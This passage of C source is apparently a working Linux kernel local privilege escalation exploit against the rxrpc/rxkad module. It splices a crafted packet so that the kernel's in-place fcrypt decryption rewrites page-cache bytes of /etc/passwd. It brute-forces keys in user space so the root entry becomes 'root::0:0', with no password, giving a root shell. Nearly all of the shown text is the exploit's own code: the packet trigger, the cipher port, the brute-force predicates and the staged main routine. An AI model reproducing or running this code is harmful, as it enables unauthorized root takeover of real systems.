= htonl(callN); mal.seq = htonl(1); mal.serial = htonl(0x42000); mal.type = RXRPC_PACKET_TYPE_DATA; mal.flags = RXRPC_LAST_PACKET; mal.securityIndex = 2; mal.cksum = htons(cksum_h); mal.serviceId = htons(svc_in); /* connect udp_srv → client port for splice */ struct sockaddr_in dst = { .sin_family=AF_INET, .sin_port=htons(cli_port), .sin_addr.s_addr=htonl(0x7F000001) }; if (connect(udp_srv, (struct sockaddr*)&dst, sizeof(dst)) < 0) { close(rxsk_cli); close(udp_srv); syscall(SYS_keyctl, 3, key); return -1; } /* pipe + vmsplice header + splice file → pipe → udp_srv */ int p[2]; if (pipe(p) < 0) { close(rxsk_cli); close(udp_srv); syscall(SYS_keyctl, 3, key); return -1; } { struct iovec viv = { .iov_base = &mal, .iov_len = sizeof(mal) }; if (vmsplice(p[1], &viv, 1, 0) < 0) goto trig_fail; } { loff_t off = splice_off; if (splice(target_fd, &off, p[1], NULL, splice_len, SPLICE_F_NONBLOCK) < 0) goto trig_fail; } if (splice(p[0], NULL, udp_srv, NULL, sizeof(mal) + splice_len, 0) < 0) { goto trig_fail; } close(p[0]); close(p[1]); /* recvmsg the malicious DATA into the kernel's verify_packet path */ int fl = fcntl(rxsk_cli, F_GETFL); fcntl(rxsk_cli, F_SETFL, fl | O_NONBLOCK); for (int round = 0; round < 5; round++) { char rb[2048]; struct sockaddr_rxrpc srx; char ccb[256]; struct msghdr m = {0}; struct iovec iv = { .iov_base = rb, .iov_len = sizeof(rb) }; m.msg_name = &srx; m.msg_namelen = sizeof(srx); m.msg_iov = &iv; m.msg_iovlen = 1; m.msg_control = ccb; m.msg_controllen = sizeof(ccb); ssize_t r = recvmsg(rxsk_cli, &m, 0); if (r > 0) break; if (errno == EAGAIN || errno == EWOULDBLOCK) usleep(20000); else break; } fcntl(rxsk_cli, F_SETFL, fl); close(rxsk_cli); close(udp_srv); syscall(SYS_keyctl, 3, key); return 0; trig_fail: close(p[0]); close(p[1]); close(rxsk_cli); close(udp_srv); syscall(SYS_keyctl, 3, key); return -1; } /* =================================================================== * USER-SPACE pcbc(fcrypt) BRUTE-FORCE * * The kernel's rxkad_verify_packet_1() does an in-place 8-byte * pcbc(fcrypt) decrypt with iv=0 over the page-cache page at the splice * offset. pcbc with single 8-B block and IV=0 reduces to a plain * fcrypt_decrypt(C, K). We can therefore search for the right K * entirely in user-space — without touching the kernel/VM at all — * before applying ONE deterministic kernel trigger. * * Port of crypto/fcrypt.c from the kernel source (David Howells / KTH). * Verified against kernel test vectors: * K=0, decrypt(0E0900C73EF7ED41) = 00000000 * K=1144...66, decrypt(D8ED787477EC0680) = 123456789ABCDEF0 * =================================================================== */ static const uint8_t fc_sbox0_raw[256] = { 0xea, 0x7f, 0xb2, 0x64, 0x9d, 0xb0, 0xd9, 0x11, 0xcd, 0x86, 0x86, 0x91, 0x0a, 0xb2, 0x93, 0x06, 0x0e, 0x06, 0xd2, 0x65, 0x73, 0xc5, 0x28, 0x60, 0xf2, 0x20, 0xb5, 0x38, 0x7e, 0xda, 0x9f, 0xe3, 0xd2, 0xcf, 0xc4, 0x3c, 0x61, 0xff, 0x4a, 0x4a, 0x35, 0xac, 0xaa, 0x5f, 0x2b, 0xbb, 0xbc, 0x53, 0x4e, 0x9d, 0x78, 0xa3, 0xdc, 0x09, 0x32, 0x10, 0xc6, 0x6f, 0x66, 0xd6, 0xab, 0xa9, 0xaf, 0xfd, 0x3b, 0x95, 0xe8, 0x34, 0x9a, 0x81, 0x72, 0x80, 0x9c, 0xf3, 0xec, 0xda, 0x9f, 0x26, 0x76, 0x15, 0x3e, 0x55, 0x4d, 0xde, 0x84, 0xee, 0xad, 0xc7, 0xf1, 0x6b, 0x3d, 0xd3, 0x04, 0x49, 0xaa, 0x24, 0x0b, 0x8a, 0x83, 0xba, 0xfa, 0x85, 0xa0, 0xa8, 0xb1, 0xd4, 0x01, 0xd8, 0x70, 0x64, 0xf0, 0x51, 0xd2, 0xc3, 0xa7, 0x75, 0x8c, 0xa5, 0x64, 0xef, 0x10, 0x4e, 0xb7, 0xc6, 0x61, 0x03, 0xeb, 0x44, 0x3d, 0xe5, 0xb3, 0x5b, 0xae, 0xd5, 0xad, 0x1d, 0xfa, 0x5a, 0x1e, 0x33, 0xab, 0x93, 0xa2, 0xb7, 0xe7, 0xa8, 0x45, 0xa4, 0xcd, 0x29, 0x63, 0x44, 0xb6, 0x69, 0x7e, 0x2e, 0x62, 0x03, 0xc8, 0xe0, 0x17, 0xbb, 0xc7, 0xf3, 0x3f, 0x36, 0xba, 0x71, 0x8e, 0x97, 0x65, 0x60, 0x69, 0xb6, 0xf6, 0xe6, 0x6e, 0xe0, 0x81, 0x59, 0xe8, 0xaf, 0xdd, 0x95, 0x22, 0x99, 0xfd, 0x63, 0x19, 0x74, 0x61, 0xb1, 0xb6, 0x5b, 0xae, 0x54, 0xb3, 0x70, 0xff, 0xc6, 0x3b, 0x3e, 0xc1, 0xd7, 0xe1, 0x0e, 0x76, 0xe5, 0x36, 0x4f, 0x59, 0xc7, 0x08, 0x6e, 0x82, 0xa6, 0x93, 0xc4, 0xaa, 0x26, 0x49, 0xe0, 0x21, 0x64, 0x07, 0x9f, 0x64, 0x81, 0x9c, 0xbf, 0xf9, 0xd1, 0x43, 0xf8, 0xb6, 0xb9, 0xf1, 0x24, 0x75, 0x03, 0xe4, 0xb0, 0x99, 0x46, 0x3d, 0xf5, 0xd1, 0x39, 0x72, 0x12, 0xf6, 0xba, 0x0c, 0x0d, 0x42, 0x2e, }; static const uint8_t fc_sbox1_raw[256] = { 0x77, 0x14, 0xa6, 0xfe, 0xb2, 0x5e, 0x8c, 0x3e, 0x67, 0x6c, 0xa1, 0x0d, 0xc2, 0xa2, 0xc1, 0x85, 0x6c, 0x7b, 0x67, 0xc6, 0x23, 0xe3, 0xf2, 0x89, 0x50, 0x9c, 0x03, 0xb7, 0x73, 0xe6, 0xe1, 0x39, 0x31, 0x2c, 0x27, 0x9f, 0xa5, 0x69, 0x44, 0xd6, 0x23, 0x83, 0x98, 0x7d, 0x3c, 0xb4, 0x2d, 0x99, 0x1c, 0x1f, 0x8c, 0x20, 0x03, 0x7c, 0x5f, 0xad, 0xf4, 0xfa, 0x95, 0xca, 0x76, 0x44, 0xcd, 0xb6, 0xb8, 0xa1, 0xa1, 0xbe, 0x9e, 0x54, 0x8f, 0x0b, 0x16, 0x74, 0x31, 0x8a, 0x23, 0x17, 0x04, 0xfa, 0x79, 0x84, 0xb1, 0xf5, 0x13, 0xab, 0xb5, 0x2e, 0xaa, 0x0c, 0x60, 0x6b, 0x5b, 0xc4, 0x4b, 0xbc, 0xe2, 0xaf, 0x45, 0x73, 0xfa, 0xc9, 0x49, 0xcd, 0x00, 0x92, 0x7d, 0x97, 0x7a, 0x18, 0x60, 0x3d, 0xcf, 0x5b, 0xde, 0xc6, 0xe2, 0xe6, 0xbb, 0x8b, 0x06, 0xda, 0x08, 0x15, 0x1b, 0x88, 0x6a, 0x17, 0x89, 0xd0, 0xa9, 0xc1, 0xc9, 0x70, 0x6b, 0xe5, 0x43, 0xf4, 0x68, 0xc8, 0xd3, 0x84, 0x28, 0x0a, 0x52, 0x66, 0xa3, 0xca, 0xf2, 0xe3, 0x7f, 0x7a, 0x31, 0xf7, 0x88, 0x94, 0x5e, 0x9c, 0x63, 0xd5, 0x24, 0x66, 0xfc, 0xb3, 0x57, 0x25, 0xbe, 0x89, 0x44, 0xc4, 0xe0, 0x8f, 0x23, 0x3c, 0x12, 0x52, 0xf5, 0x1e, 0xf4, 0xcb, 0x18, 0x33, 0x1f, 0xf8, 0x69, 0x10, 0x9d, 0xd3, 0xf7, 0x28, 0xf8, 0x30, 0x05, 0x5e, 0x32, 0xc0, 0xd5, 0x19, 0xbd, 0x45, 0x8b, 0x5b, 0xfd, 0xbc, 0xe2, 0x5c, 0xa9, 0x96, 0xef, 0x70, 0xcf, 0xc2, 0x2a, 0xb3, 0x61, 0xad, 0x80, 0x48, 0x81, 0xb7, 0x1d, 0x43, 0xd9, 0xd7, 0x45, 0xf0, 0xd8, 0x8a, 0x59, 0x7c, 0x57, 0xc1, 0x79, 0xc7, 0x34, 0xd6, 0x43, 0xdf, 0xe4, 0x78, 0x16, 0x06, 0xda, 0x92, 0x76, 0x51, 0xe1, 0xd4, 0x70, 0x03, 0xe0, 0x2f, 0x96, 0x91, 0x82, 0x80, }; static const uint8_t fc_sbox2_raw[256] = { 0xf0, 0x37, 0x24, 0x53, 0x2a, 0x03, 0x83, 0x86, 0xd1, 0xec, 0x50, 0xf0, 0x42, 0x78, 0x2f, 0x6d, 0xbf, 0x80, 0x87, 0x27, 0x95, 0xe2, 0xc5, 0x5d, 0xf9, 0x6f, 0xdb, 0xb4, 0x65, 0x6e, 0xe7, 0x24, 0xc8, 0x1a, 0xbb, 0x49, 0xb5, 0x0a, 0x7d, 0xb9, 0xe8, 0xdc, 0xb7, 0xd9, 0x45, 0x20, 0x1b, 0xce, 0x59, 0x9d, 0x6b, 0xbd, 0x0e, 0x8f, 0xa3, 0xa9, 0xbc, 0x74, 0xa6, 0xf6, 0x7f, 0x5f, 0xb1, 0x68, 0x84, 0xbc, 0xa9, 0xfd, 0x55, 0x50, 0xe9, 0xb6, 0x13, 0x5e, 0x07, 0xb8, 0x95, 0x02, 0xc0, 0xd0, 0x6a, 0x1a, 0x85, 0xbd, 0xb6, 0xfd, 0xfe, 0x17, 0x3f, 0x09, 0xa3, 0x8d, 0xfb, 0xed, 0xda, 0x1d, 0x6d, 0x1c, 0x6c, 0x01, 0x5a, 0xe5, 0x71, 0x3e, 0x8b, 0x6b, 0xbe, 0x29, 0xeb, 0x12, 0x19, 0x34, 0xcd, 0xb3, 0xbd, 0x35, 0xea, 0x4b, 0xd5, 0xae, 0x2a, 0x79, 0x5a, 0xa5, 0x32, 0x12, 0x7b, 0xdc, 0x2c, 0xd0, 0x22, 0x4b, 0xb1, 0x85, 0x59, 0x80, 0xc0, 0x30, 0x9f, 0x73, 0xd3, 0x14, 0x48, 0x40, 0x07, 0x2d, 0x8f, 0x80, 0x0f, 0xce, 0x0b, 0x5e, 0xb7, 0x5e, 0xac, 0x24, 0x94, 0x4a, 0x18, 0x15, 0x05, 0xe8, 0x02, 0x77, 0xa9, 0xc7, 0x40, 0x45, 0x89, 0xd1, 0xea, 0xde, 0x0c, 0x79, 0x2a, 0x99, 0x6c, 0x3e, 0x95, 0xdd, 0x8c, 0x7d, 0xad, 0x6f, 0xdc, 0xff, 0xfd, 0x62, 0x47, 0xb3, 0x21, 0x8a, 0xec, 0x8e, 0x19, 0x18, 0xb4, 0x6e, 0x3d, 0xfd, 0x74, 0x54, 0x1e, 0x04, 0x85, 0xd8, 0xbc, 0x1f, 0x56, 0xe7, 0x3a, 0x56, 0x67, 0xd6, 0xc8, 0xa5, 0xf3, 0x8e, 0xde, 0xae, 0x37, 0x49, 0xb7, 0xfa, 0xc8, 0xf4, 0x1f, 0xe0, 0x2a, 0x9b, 0x15, 0xd1, 0x34, 0x0e, 0xb5, 0xe0, 0x44, 0x78, 0x84, 0x59, 0x56, 0x68, 0x77, 0xa5, 0x14, 0x06, 0xf5, 0x2f, 0x8c, 0x8a, 0x73, 0x80, 0x76, 0xb4, 0x10, 0x86, }; static const uint8_t fc_sbox3_raw[256] = { 0xa9, 0x2a, 0x48, 0x51, 0x84, 0x7e, 0x49, 0xe2, 0xb5, 0xb7, 0x42, 0x33, 0x7d, 0x5d, 0xa6, 0x12, 0x44, 0x48, 0x6d, 0x28, 0xaa, 0x20, 0x6d, 0x57, 0xd6, 0x6b, 0x5d, 0x72, 0xf0, 0x92, 0x5a, 0x1b, 0x53, 0x80, 0x24, 0x70, 0x9a, 0xcc, 0xa7, 0x66, 0xa1, 0x01, 0xa5, 0x41, 0x97, 0x41, 0x31, 0x82, 0xf1, 0x14, 0xcf, 0x53, 0x0d, 0xa0, 0x10, 0xcc, 0x2a, 0x7d, 0xd2, 0xbf, 0x4b, 0x1a, 0xdb, 0x16, 0x47, 0xf6, 0x51, 0x36, 0xed, 0xf3, 0xb9, 0x1a, 0xa7, 0xdf, 0x29, 0x43, 0x01, 0x54, 0x70, 0xa4, 0xbf, 0xd4, 0x0b, 0x53, 0x44, 0x60, 0x9e, 0x23, 0xa1, 0x18, 0x68, 0x4f, 0xf0, 0x2f, 0x82, 0xc2, 0x2a, 0x41, 0xb2, 0x42, 0x0c, 0xed, 0x0c, 0x1d, 0x13, 0x3a, 0x3c, 0x6e, 0x35, 0xdc, 0x60, 0x65, 0x85, 0xe9, 0x64, 0x02, 0x9a, 0x3f, 0x9f, 0x87, 0x96, 0xdf, 0xbe, 0xf2, 0xcb, 0xe5, 0x6c, 0xd4, 0x5a, 0x83, 0xbf, 0x92, 0x1b, 0x94, 0x00, 0x42, 0xcf, 0x4b, 0x00, 0x75, 0xba, 0x8f, 0x76, 0x5f, 0x5d, 0x3a, 0x4d, 0x09, 0x12, 0x08, 0x38, 0x95, 0x17, 0xe4, 0x01, 0x1d, 0x4c, 0xa9, 0xcc, 0x85, 0x82, 0x4c, 0x9d, 0x2f, 0x3b, 0x66, 0xa1, 0x34, 0x10, 0xcd, 0x59, 0x89, 0xa5, 0x31, 0xcf, 0x05, 0xc8, 0x84, 0xfa, 0xc7, 0xba, 0x4e, 0x8b, 0x1a, 0x19, 0xf1, 0xa1, 0x3b, 0x18, 0x12, 0x17, 0xb0, 0x98, 0x8d, 0x0b, 0x23, 0xc3, 0x3a, 0x2d, 0x20, 0xdf, 0x13, 0xa0, 0xa8, 0x4c, 0x0d, 0x6c, 0x2f, 0x47, 0x13, 0x13, 0x52, 0x1f, 0x2d, 0xf5, 0x79, 0x3d, 0xa2, 0x54, 0xbd, 0x69, 0xc8, 0x6b, 0xf3, 0x05, 0x28, 0xf1, 0x16, 0x46, 0x40, 0xb0, 0x11, 0xd3, 0xb7, 0x95, 0x49, 0xcf, 0xc3, 0x1d, 0x8f, 0xd8, 0xe1, 0x73, 0xdb, 0xad, 0xc8, 0xc9, 0xa9, 0xa1, 0xc2, 0xc5, 0xe3, 0xba, 0xfc, 0x0e, 0x25, }; static uint32_t fc_sbox0[256], fc_sbox1[256], fc_sbox2[256], fc_sbox3[256]; #include static void fcrypt_init_sboxes(void) { for (int i = 0; i < 256; i++) { fc_sbox0[i] = htobe32((uint32_t)fc_sbox0_raw[i] << 3); fc_sbox1[i] = htobe32(((uint32_t)(fc_sbox1_raw[i] & 0x1f) << 27) | ((uint32_t)fc_sbox1_raw[i] >> 5)); fc_sbox2[i] = htobe32((uint32_t)fc_sbox2_raw[i] << 11); fc_sbox3[i] = htobe32((uint32_t)fc_sbox3_raw[i] << 19); } } #define fc_ror56_64(k, n) \ (k = (k >> (n)) | ((k & ((1ULL << (n)) - 1)) << (56 - (n)))) typedef struct { uint32_t sched[16]; } fcrypt_uctx; static void fcrypt_user_setkey(fcrypt_uctx *ctx, const uint8_t key[8]) { uint64_t k = 0; k = (uint64_t)(key[0] >> 1); k <<= 7; k |= (uint64_t)(key[1] >> 1); k <<= 7; k |= (uint64_t)(key[2] >> 1); k <<= 7; k |= (uint64_t)(key[3] >> 1); k <<= 7; k |= (uint64_t)(key[4] >> 1); k <<= 7; k |= (uint64_t)(key[5] >> 1); k <<= 7; k |= (uint64_t)(key[6] >> 1); k <<= 7; k |= (uint64_t)(key[7] >> 1); ctx->sched[0x0] = htobe32((uint32_t)k); fc_ror56_64(k, 11); ctx->sched[0x1] = htobe32((uint32_t)k); fc_ror56_64(k, 11); ctx->sched[0x2] = htobe32((uint32_t)k); fc_ror56_64(k, 11); ctx->sched[0x3] = htobe32((uint32_t)k); fc_ror56_64(k, 11); ctx->sched[0x4] = htobe32((uint32_t)k); fc_ror56_64(k, 11); ctx->sched[0x5] = htobe32((uint32_t)k); fc_ror56_64(k, 11); ctx->sched[0x6] = htobe32((uint32_t)k); fc_ror56_64(k, 11); ctx->sched[0x7] = htobe32((uint32_t)k); fc_ror56_64(k, 11); ctx->sched[0x8] = htobe32((uint32_t)k); fc_ror56_64(k, 11); ctx->sched[0x9] = htobe32((uint32_t)k); fc_ror56_64(k, 11); ctx->sched[0xa] = htobe32((uint32_t)k); fc_ror56_64(k, 11); ctx->sched[0xb] = htobe32((uint32_t)k); fc_ror56_64(k, 11); ctx->sched[0xc] = htobe32((uint32_t)k); fc_ror56_64(k, 11); ctx->sched[0xd] = htobe32((uint32_t)k); fc_ror56_64(k, 11); ctx->sched[0xe] = htobe32((uint32_t)k); fc_ror56_64(k, 11); ctx->sched[0xf] = htobe32((uint32_t)k); } #define FC_F(R_, L_, sched_) do { \ union { uint32_t l; uint8_t c[4]; } u; \ u.l = (sched_) ^ (R_); \ L_ ^= fc_sbox0[u.c[0]] ^ fc_sbox1[u.c[1]] ^ \ fc_sbox2[u.c[2]] ^ fc_sbox3[u.c[3]]; \ } while (0) static void fcrypt_user_decrypt(const fcrypt_uctx *ctx, uint8_t out[8], const uint8_t in[8]) { uint32_t L, R; memcpy(&L, in, 4); memcpy(&R, in + 4, 4); FC_F(L, R, ctx->sched[0xf]); FC_F(R, L, ctx->sched[0xe]); FC_F(L, R, ctx->sched[0xd]); FC_F(R, L, ctx->sched[0xc]); FC_F(L, R, ctx->sched[0xb]); FC_F(R, L, ctx->sched[0xa]); FC_F(L, R, ctx->sched[0x9]); FC_F(R, L, ctx->sched[0x8]); FC_F(L, R, ctx->sched[0x7]); FC_F(R, L, ctx->sched[0x6]); FC_F(L, R, ctx->sched[0x5]); FC_F(R, L, ctx->sched[0x4]); FC_F(L, R, ctx->sched[0x3]); FC_F(R, L, ctx->sched[0x2]); FC_F(L, R, ctx->sched[0x1]); FC_F(R, L, ctx->sched[0x0]); memcpy(out, &L, 4); memcpy(out + 4, &R, 4); } /* For the 2-splice chain we want the line to have EXACTLY 6 ':' and a * shell field that equals "/bin/bash" (in /etc/shells, valid path). * The two splices interlock as: * * bytes 7..14 (offset 2800): P1 — sets uid=0, gid=1 digit, then * 4 random gecos-prefix bytes. * bytes 15..22 (offset 2808): P2 — wipes the original ':' at line * pos 16, preserves ':' at pos 21 and '/' at pos 22. * * Combined line: "test:x:0:G:GGGGGGGGGG:/home/test:/bin/bash" * pos 0 8 21 32 * * pw_uid=0, pw_gid=G, pw_dir="/home/test", pw_shell="/bin/bash". * Now `su -s /bin/bash test` proceeds through the restricted_shell() * check (because /bin/bash IS in /etc/shells) and exec()s /bin/bash * under uid=0. * * === 3-splice predicates === * * After applying splices A, B, C in order to /etc/passwd line 1 * (offsets 4, 6, 8 — each 8 bytes, last-write-wins), the final state * of chars 4..15 is determined by these P bytes: * * char 4 = P_A[0] want: ':' * char 5 = P_A[1] want: ':' * char 6 = P_B[0] want: '0' (overwrites P_A[2]) * char 7 = P_B[1] want: ':' (overwrites P_A[3]) * char 8 = P_C[0] want: '0' (overwrites P_A[4]/P_B[2]) * char 9 = P_C[1] want: ':' (overwrites P_A[5]/P_B[3]) * char 10..14 = P_C[2..6] want: any byte except ':' '\0' '\n' * char 15 = P_C[7] want: ':' * * The constraints on P_A[2..7] and P_B[2..7] are vacuous because they * are overwritten before /etc/passwd is read by anyone — we only care * about the final state. */ static inline int fc_check_pa_nullok(const uint8_t P[8]) { return P[0] == ':' && P[1] == ':'; } static inline int fc_check_pb_nullok(const uint8_t P[8]) { return P[0] == '0' && P[1] == ':'; } static inline int fc_check_pc_nullok(const uint8_t P[8]) { if (P[0] != '0') return 0; if (P[1] != ':') return 0; if (P[7] != ':') return 0; for (int i = 2; i < 7; i++) { if (P[i] == ':' || P[i] == '\0' || P[i] == '\n') return 0; } return 1; } static uint64_t fc_splitmix64(uint64_t *s) { uint64_t z = (*s += 0x9E3779B97F4A7C15ULL); z = (z ^ (z >> 30)) * 0xBF58476D1CE4E5B9ULL; z = (z ^ (z >> 27)) * 0x94D049BB133111EBULL; return z ^ (z >> 31); } /* Generic brute-force. `predicate` decides if a P is acceptable. */ typedef int (*pcheck_fn)(const uint8_t P[8]); static int find_K_offline_generic(const uint8_t C[8], uint64_t max_iters, pcheck_fn check, uint8_t K_out[8], uint8_t P_out[8], uint64_t seed_init, const char *label) { fcrypt_uctx ctx; uint8_t K[8], P[8]; uint64_t seed = seed_init; struct timespec ts0, ts1; clock_gettime(CLOCK_MONOTONIC, &ts0); for (uint64_t iter = 0; iter < max_iters; iter++) { uint64_t r = fc_splitmix64(&seed); memcpy(K, &r, 8); fcrypt_user_setkey(&ctx, K); fcrypt_user_decrypt(&ctx, P, C); if (check(P)) { memcpy(K_out, K, 8); memcpy(P_out, P, 8); clock_gettime(CLOCK_MONOTONIC, &ts1); double dt = (ts1.tv_sec - ts0.tv_sec) + (ts1.tv_nsec - ts0.tv_nsec) / 1e9; LOG("%s found after %lu iters in %.2fs (%.2fM/s) K=%02x%02x%02x%02x%02x%02x%02x%02x P=%02x%02x%02x%02x%02x%02x%02x%02x \"%c%c%c%c%c%c%c%c\"", label, (unsigned long)iter, dt, iter / dt / 1e6, K[0],K[1],K[2],K[3],K[4],K[5],K[6],K[7], P[0],P[1],P[2],P[3],P[4],P[5],P[6],P[7], (P[0]>=32&&P[0]<127)?P[0]:'.', (P[1]>=32&&P[1]<127)?P[1]:'.', (P[2]>=32&&P[2]<127)?P[2]:'.', (P[3]>=32&&P[3]<127)?P[3]:'.', (P[4]>=32&&P[4]<127)?P[4]:'.', (P[5]>=32&&P[5]<127)?P[5]:'.', (P[6]>=32&&P[6]<127)?P[6]:'.', (P[7]>=32&&P[7]<127)?P[7]:'.'); return 0; } if ((iter & 0x3ffffff) == 0 && iter > 0) { clock_gettime(CLOCK_MONOTONIC, &ts1); double dt = (ts1.tv_sec - ts0.tv_sec) + (ts1.tv_nsec - ts0.tv_nsec) / 1e9; fprintf(stderr, " [%s %.1fs] iter=%lu (%.2fM/s)\n", label, dt, (unsigned long)iter, iter / dt / 1e6); } } return -1; } int rxrpc_lpe_main(int argc, char **argv) { fprintf(stderr, "\n=== rxrpc/rxkad LPE EXPLOIT (uid=1000 → root) ===\n"); fprintf(stderr, "[*] uid=%u euid=%u gid=%u\n", getuid(), geteuid(), getgid()); { const char *no_unshare = getenv("POC_NO_UNSHARE"); if (!no_unshare || *no_unshare != '1') { const char *do_unshare = getenv("POC_UNSHARE"); if (do_unshare && *do_unshare == '1') { if (do_unshare_userns_netns() < 0) return 1; } } } /* Open a dummy AF_RXRPC socket to autoload the rxrpc kernel module. * Without this, the first add_key("rxrpc", ...) call fails with ENODEV * because the kernel key type "rxrpc" is registered by rxrpc_init() in * the module load path. */ { int dummy = socket(AF_RXRPC, SOCK_DGRAM, PF_INET); if (dummy < 0) { WARN("socket(AF_RXRPC): %s — module not loadable?", strerror(errno)); return 1; } close(dummy); LOG("rxrpc module autoloaded via dummy socket(AF_RXRPC)"); } /* Open /etc/passwd RO and mmap the first page (which contains the * root entry on line 1). */ const char *target_path = getenv("POC_TARGET_FILE"); if (!target_path || !*target_path) target_path = "/etc/passwd"; int rfd_ro = open(target_path, O_RDONLY); if (rfd_ro < 0) { WARN("open %s RO: %s", target_path, strerror(errno)); return 1; } struct stat st; fstat(rfd_ro, &st); if (st.st_size < 32) { WARN("target too small: %lld", (long long)st.st_size); return 1; } LOG("target %s opened RO, size=%lld, uid=%u gid=%u mode=%04o", target_path, (long long)st.st_size, st.st_uid, st.st_gid, st.st_mode & 07777); /* mmap first page so the page-cache page stays pinned. */ void *map = mmap(NULL, 4096, PROT_READ, MAP_SHARED, rfd_ro, 0); if (map == MAP_FAILED) { WARN("mmap: %s", strerror(errno)); return 1; } LOG("mmap'd %s page-cache at %p (PROT_READ|MAP_SHARED)", target_path, map); /* If a previous attempt already left the root entry in the patched * "root::0:0:..." form, treat as success and skip the brute-force / * trigger stages. Otherwise proceed regardless of current state — * the brute-force re-derives K_A/K_B/K_C from whatever bytes are * currently at offsets 4/6/8 of the page-cache page, so it works * even on the corrupt residue from a previous failed run. */ { const char *m = (const char *)map; if (memcmp(m, "root::0:0", 9) == 0) { LOG("%s already patched (root::0:0...) — nothing to do", target_path); return 0; } LOG("%s line 1 first 16 bytes:", target_path); for (int i = 0; i < 16; i++) fprintf(stderr, "%02x ", (uint8_t)m[i]); fprintf(stderr, "\n"); } fprintf(stderr, "[*] %s line 1 (root entry) BEFORE: '", target_path); for (int i = 0; i < 32; i++) { char c = ((const char *)map)[i]; fputc((c == '\n') ? '$' : (c >= 32 && c < 127 ? c : '.'), stderr); } fprintf(stderr, "'\n"); /* === STAGE 1 — THREE-SPLICE OFFLINE BRUTE FORCE === * * Read THREE 8-byte ciphertexts at file offsets 4, 6, 8. Search * independently for K_A (chars 4-5 = "::"), K_B (chars 6-7 = "0:"), * K_C (chars 8-15 = "0:GGGGGG:" with G non-control). All searches * are user-space only — no kernel/VM interaction. * * Last-write-wins ordering: trigger A first (covers 4..11), then B * (covers 6..13 — overrides A's 6..11), then C (covers 8..15 — * overrides A's 8..11 and B's 8..13). Final state of chars 4..15: * chars 4..5 = P_A[0..1] * chars 6..7 = P_B[0..1] * chars 8..15 = P_C[0..7] * =================================================================*/ uint8_t Ca[8], Cb[8], Cc[8]; int off_a = 4, off_b = 6, off_c = 8; if (pread(rfd_ro, Ca, 8, off_a) != 8) { WARN("pread Ca: %s", strerror(errno)); return 1; } if (pread(rfd_ro, Cb, 8, off_b) != 8) { WARN("pread Cb: %s", strerror(errno)); return 1; } if (pread(rfd_ro, Cc, 8, off_c) != 8) { WARN("pread Cc: %s", strerror(errno)); return 1; } LOG("Ca @ %d: %02x%02x%02x%02x%02x%02x%02x%02x \"%c%c%c%c%c%c%c%c\"", off_a, Ca[0],Ca[1],Ca[2],Ca[3],Ca[4],Ca[5],Ca[6],Ca[7], (Ca[0]>=32&&Ca[0]<127)?Ca[0]:'.', (Ca[1]>=32&&Ca[1]<127)?Ca[1]:'.', (Ca[2]>=32&&Ca[2]<127)?Ca[2]:'.', (Ca[3]>=32&&Ca[3]<127)?Ca[3]:'.', (Ca[4]>=32&&Ca[4]<127)?Ca[4]:'.', (Ca[5]>=32&&Ca[5]<127)?Ca[5]:'.', (Ca[6]>=32&&Ca[6]<127)?Ca[6]:'.', (Ca[7]>=32&&Ca[7]<127)?Ca[7]:'.'); LOG("Cb @ %d: %02x%02x%02x%02x%02x%02x%02x%02x \"%c%c%c%c%c%c%c%c\"", off_b, Cb[0],Cb[1],Cb[2],Cb[3],Cb[4],Cb[5],Cb[6],Cb[7], (Cb[0]>=32&&Cb[0]<127)?Cb[0]:'.', (Cb[1]>=32&&Cb[1]<127)?Cb[1]:'.', (Cb[2]>=32&&Cb[2]<127)?Cb[2]:'.', (Cb[3]>=32&&Cb[3]<127)?Cb[3]:'.', (Cb[4]>=32&&Cb[4]<127)?Cb[4]:'.', (Cb[5]>=32&&Cb[5]<127)?Cb[5]:'.', (Cb[6]>=32&&Cb[6]<127)?Cb[6]:'.', (Cb[7]>=32&&Cb[7]<127)?Cb[7]:'.'); LOG("Cc @ %d: %02x%02x%02x%02x%02x%02x%02x%02x \"%c%c%c%c%c%c%c%c\"", off_c, Cc[0],Cc[1],Cc[2],Cc[3],Cc[4],Cc[5],Cc[6],Cc[7], (Cc[0]>=32&&Cc[0]<127)?Cc[0]:'.', (Cc[1]>=32&&Cc[1]<127)?Cc[1]:'.', (Cc[2]>=32&&Cc[2]<127)?Cc[2]:'.', (Cc[3]>=32&&Cc[3]<127)?Cc[3]:'.', (Cc[4]>=32&&Cc[4]<127)?Cc[4]:'.', (Cc[5]>=32&&Cc[5]<127)?Cc[5]:'.', (Cc[6]>=32&&Cc[6]<127)?Cc[6]:'.', (Cc[7]>=32&&Cc[7]<127)?Cc[7]:'.'); fcrypt_init_sboxes(); /* selftest */ { fcrypt_uctx ctx; uint8_t z[8] = {0}; uint8_t cv[8] = { 0x0E, 0x09, 0x00, 0xC7, 0x3E, 0xF7, 0xED, 0x41 }; uint8_t pv[8]; fcrypt_user_setkey(&ctx, z); fcrypt_user_decrypt(&ctx, pv, cv); if (memcmp(pv, z, 8) != 0) { WARN("fcrypt selftest FAILED"); return 1; } } LOG("fcrypt selftest OK"); uint8_t Ka[8], Pa_out[8]; uint8_t Kb[8], Pb_out[8]; uint8_t Kc[8], Pc_out[8]; uint8_t Cb_actual[8], Cc_actual[8]; { uint64_t max_iters = 10000000000ULL; const char *e = getenv("LPE_MAX_ITERS"); if (e) max_iters = strtoull(e, NULL, 0); uint64_t seed_base = (uint64_t)time(NULL) * 0x100000001ULL ^ (uint64_t)getpid(); const char *se = getenv("LPE_SEED"); if (se) seed_base = strtoull(se, NULL, 0); fprintf(stderr, "\n=== STAGE 1a: search K_A (chars 4-5 := \"::\") prob ~1.5e-5 ===\n"); if (find_K_offline_generic(Ca, max_iters, fc_check_pa_nullok, Ka, Pa_out, seed_base, "K_A") != 0) { WARN("K_A search exhausted"); return 2; } /* After splice A is applied, the ciphertext that splice B will * see at file offset 6 is NOT the original Cb — it's the bytes * that splice A wrote to file offsets 6..11 (= Pa[2..7]) plus * the original bytes 12..13 (= Cb[6..7]). We must derive * Cb_actual and search K_B against it. */ memcpy(Cb_actual, Pa_out + 2, 6); memcpy(Cb_actual + 6, Cb + 6, 2); LOG("Cb_actual (after splice A) = %02x%02x%02x%02x%02x%02x%02x%02x", Cb_actual[0],Cb_actual[1],Cb_actual[2],Cb_actual[3], Cb_actual[4],Cb_actual[5],Cb_actual[6],Cb_actual[7]); fprintf(stderr, "\n=== STAGE 1b: search K_B (chars 6-7 := \"0:\") prob ~1.5e-5 ===\n"); if (find_K_offline_generic(Cb_actual, max_iters, fc_check_pb_nullok, Kb, Pb_out, seed_base ^ 0xa5a5a5a5a5a5a5a5ULL, "K_B") != 0) { 